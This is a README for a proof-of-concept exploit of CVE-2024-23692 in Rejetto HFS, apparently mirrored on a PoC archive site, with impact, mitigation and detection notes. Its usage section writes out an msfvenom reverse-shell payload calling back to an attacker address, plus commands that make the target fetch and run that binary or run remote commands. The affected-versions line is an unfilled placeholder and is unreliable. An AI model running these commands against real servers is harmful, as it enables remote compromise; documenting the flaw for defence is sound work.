关联漏洞
介绍
# Rejetto HFS (HTTP File Server) CVE-2024-23692 Vulnerability
___
## Overview
Rejetto HFS (HTTP File Server) is a simple web file server that facilitates file sharing over a network or the internet. Despite its ease of use and simplicity, a critical vulnerability (CVE-2024-23692) has been discovered, making the server a target for attackers.
___
## CVE-2024-23692: Server-Side Template Injection (SSTI) Vulnerability
___
### Description
CVE-2024-23692 is a Server-Side Template Injection (SSTI) vulnerability identified in Rejetto HFS. This vulnerability allows an attacker to inject and execute malicious templates on the server. If exploited, it can lead to remote code execution, potentially compromising the entire server and the data it hosts.
___
### Impact
An attacker exploiting this vulnerability can:
- Execute arbitrary code on the server
- Gain unauthorized access to sensitive data
- Compromise the integrity and availability of the server
- Use the compromised server to launch further attacks within the network
___
### Usage
Obtain a shell using a malicious binary created in msfvenom.
Note: Leave nc listening.
```bash
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
```
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
Run a command remotely.
```bash
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
```
*It may take approximately 15 seconds to display the result.*
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
___
### Affected Versions
All versions of Rejetto HFS up to and including version [insert latest vulnerable version here] are affected by this vulnerability.
___
### Mitigation
To mitigate the risk posed by CVE-2024-23692, users are advised to:
- **Update to the latest version:** Ensure you are using a version of Rejetto HFS where this vulnerability has been patched. Check the official Rejetto HFS website or repository for the latest updates.
- **Apply Security Best Practices:** Restrict access to the HFS server to trusted networks and users only. Use strong authentication and authorization mechanisms.
- **Monitor and Audit:** Regularly monitor the server for unusual activity and audit logs for signs of exploitation.
___
### Detection
To determine if your server has been compromised, look for:
- Unusual network traffic originating from the server
- Unexpected files or processes on the server
- Unauthorized changes to server configurations or data
___
### Reporting and Assistance
For further assistance and support, refer to the Rejetto HFS community forums or the official support channels.
___
## Resources
- [Rejetto HFS Official Website](https://rejetto.com/hfs/)
- [CVE-2024-23692 Details](https://securityonline.info/cve-2024-23692-unauthenticated-rce-flaw-in-rejetto-http-file-server-poc-published/)
___
## License
This project is licensed under the MIT License - see the LICENSE file for details.
___
文件快照
[4.0K] /data/pocs/71a995929e78fef96e0927a6a64677edcf7763a3
├── [3.1K] CVE-2024-23692.sh
├── [4.0K] img
│ ├── [250K] Screenshot_1.png
│ ├── [291K] Screenshot_2.png
│ └── [ 1] thanks!
└── [3.0K] README.md
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →